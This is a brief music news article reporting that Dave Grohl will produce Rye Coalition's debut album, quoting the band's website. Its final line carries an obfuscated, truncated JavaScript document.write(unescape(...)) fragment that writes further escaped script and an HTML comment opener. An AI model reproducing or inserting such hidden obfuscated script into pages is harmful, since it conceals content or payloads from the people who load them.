Foo Fighters frontman Dave Grohl is to take the producers reigns for the debut album of US rock group Rye Coalition.
The New Jersey five-piece caught the attention of Grohl after a support slot with Queens Of The Stone Age and were delighted after what they considered a long shot became reality when Grohl agreed.
The Foo Fighters main man and formed Nirvana drummer has previously worked on the other side of the mixing console with rock three-piece Verbena on their 1999 sophomore album 'In The Pink'.
The official Rye Coalition website explains how the partnership came about:
'In June, the band signed to Dreamworks Records, and after touring with Queens Of The Stone Age, and more recently The Mars Volta, the band retreated to New Jersey to write songs for their upcoming release. In that time, the band worked closely with A&R rep, Kelly "The Tick" Salcido, and made a wish list of top-notch producers.
What the band thought was a long-shot turned into a sure-shot when Dave Grohl had not only heard the music and loved it, but turned out to have mutual friends who swore by the band and their incredible live shows. Rye Coalition and Grohl met, and the bond was formed."
No release date has yet been confirmed for the LP, which is expected for release this spring.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
